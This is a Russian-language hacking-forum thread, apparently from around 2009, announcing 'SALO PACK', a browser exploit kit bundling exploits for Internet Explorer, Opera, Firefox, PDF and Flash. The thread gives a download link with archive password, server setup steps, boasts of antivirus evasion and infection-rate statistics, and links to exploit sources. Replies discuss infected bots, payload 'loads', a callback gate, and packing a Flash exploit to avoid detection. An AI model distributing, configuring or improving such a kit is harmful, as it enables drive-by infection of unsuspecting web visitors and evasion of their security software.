[SALO PACK] Alpha version
 

не актуально :)

• Данный програмный продукт предназначен только для образовательных целей. Использование его в любом другом
  виде может быть расценено как нарушение закона!
• Запрещена продажа и использование исходного кода SALO PACK в коммерческих целях

Круто, да? :D

Мультисистемная связка эксплойтов со статистикой. (Написана с нуля)

• Крипт кода эксплойтов по технологии разработанной UASC. (n0153r)
• Использование технологии Sajax
• Детальная статистика по странам, пробиву, браузерам, операционным системам.
• Подсчет пробива без необходимости использования ПО заходящего на URL статистики.
• Абсолютно ничего не палится АВ

На этот момент SALO PACK представляет собой набор из 6-х эксплойтов

Пример статистики:
http://i053.radikal.ru/0907/04/42b29b00dda4t.jpg
Или:
Кол-во посетителей 175
Кол-во зараженных 49
Общая пробиваемость 28%
ІЕ зараженных 97.96%
Установка

• Отредактируйте файл cfg.php в соответствии с вашими данными.
• В файле cfg.php строчку:
  
  Код:

  ---

  $config_adminPass=md5("xek");

  ---

  Замените на
  
  Код:

  ---

  $config_adminPass=ВАШ_ПАРОЛЬ_В_МД5

  ---

• Загрузите все файлы из архива на сервер.
• Установите права 777 на файл cfg.php.
• Запустите скрипт sql.php.
• Зайдите в админ-центр (/admin/), перейдите в меню "Настройки", и загрузите свой файл.

Скриншуты

Вход в админку:
http://s45.radikal.ru/i110/0907/88/4d38cc90df3bt.jpg

Пробитые ИП:
http://s60.radikal.ru/i170/0907/9a/d9b0fe0cfa6ct.jpg

Настройки:
http://i023.radikal.ru/0907/d1/d38ad7bc93e8t.jpg

Скачать: (Пароль - _roa_salopack)
http://uasc.org.ua/files/SALO_PACK_v_1.1.rar
P.S. Если у кого есть желание поделится сплойтами, и поддержать проект - велкам ПМ. Особенно нужен флеш сплойт.

хек. держи +
а так, неплохо было бы в описание добавить что за эксплоиты используются

Адепт .. а почему со сплойта идёт редирект на http://[xxx]/t/gate.php

Это для теста погрузилось тебе ПО. Ничего опасного нет, отстук просто на гейт.
Можете реверсить, проверять и тд.

8 ишак пробивает?

Сплоит под флеш - уже устарел (а более новых версия в руки не попадало както)

отпиши плиз какие сплойты юзаются

П.С. НАЗВАНИЕ ТРУ)))

вотэто лучше убрать... или хотябы предуприждение написать

А как определяеься заражон комп или нет?
заходил через ие7 в стате пишеться что заражен, хотя на самом деле файл небыл запущен

f.php:и везде подобавлять error_reporting(0);

Народ, сегодня уезжаю, поэтому может не успею ответить на все вопросы.

2 nc.STRIEM Поправим.

Определение пробива происходит следующим образом: код сплойта исполняется, в конце отправляется результат с помощью Sajax

Все указанные погрешности постараюсь исправить как только будет возможность

На счет списка сплойтов:
Дело в том, что связка начала писатся около полгода назад, и названия сплойтов надо просто вспоминать, ведь щас они криптованые.
Под Оперу:
IE7 Sploit (DirectShow)
Opera 9.62 [exploit] - https://forum.antichat.ru/printthread.php?t=57602&pp=40 полностю переделаный от n0153r
Осел
1 - http://unitedcrew.org/viewtopic.php?p=55556
2 - http://eriz.pcinside.pl/weblog/gadu-padu-trojanik-64.html
3 - https://forum.antichat.ru/printthread.php?t=43038&pp=40

также прошу не забывать от том что совместным автором является n0153r

Вот Flash сплоит. Вроде как под 12 версий флеша.
Когда то писал для своей связки.
Алгоритм работы такой:
Грузится файл flash.dat - неупакованная флешка - сигнатура FWS
Затем в неё вбивается адрес для скачевания файла.
И Потом пакуется всё это гзипом и добавляются заголовки для получения упакованной флешки (сигнатура CWS) - для беспаливности )

Спасибо =) Сейчас розберусь и добавлю все.
Жди в скором времени апдейт ...

вообщем тестил я связку на 2 ботах, в обоих случаях ничего не остучало, 1 бота слили 100 лоадов по стате в 40% пробива) второго 20 лоадов и ничего не отстукало)

у меня ни ИЕ7 ни Лису 2, ни оперу не пробило, хотя писало что пробив был.
Кстати ИЕ любезно предложил запустить сплойт, я эту инициативу одобрил, однако он в ответ завис, так и не запустив мою заветную программулину. =(

Ну наконец дошли руки обновить связку.
Посидели с Димкой и наколдовали обновления.
Добавили сплоит под ПДФ и под ФФ 3.5
Все что собрали до отпуска :)
Может у кого нить есть что-то интересное - предлагайте.

А вот и линк : http://uasc.org.ua/files/SALO_PACK_v_1.1.rar

Жду критику :)
P/S думаю до версии 2.0 все будет работать как часики .
Делали с душой для все РОА.
Спасибо за внимание.

404 по линку

http://uasc.org.ua/files/SALO_PACK_v_1.1.rar

Аналогинчно как и у sboy20042 и Twoster система отписала 100 загрузок, а в реале ничего не прогрузилось

ff-3.5.php спалился нодом при распаковке, мне кажется в работе смысла тестить нету

это все фигня - это же php файл... у меня на r57shell тоже антивирь когда-то ругался (когда винда была). Когда заходишь на страничку с шеллом - он ведь ничего не орет

Ну как не орет.
On-demand access сканер, конечно, проверяет файл кеша - как следствие - лично у меня, орёт.

не вижу смысла вообще в обсуждении потому как кроме дизайна в свяке ничего не пашет

будем надеяться, что у авторов хватит времени и энтузиазма поправить все =)

Что там править, если спалены механизмы эксплуатации?

моя твоя не понимать... объясни, пожалуйста, тупому?

Все баги что там есть уже:
1) палятся антивирусами, как шеллкод не меняй.
2) не работают, потому что все уже залатно.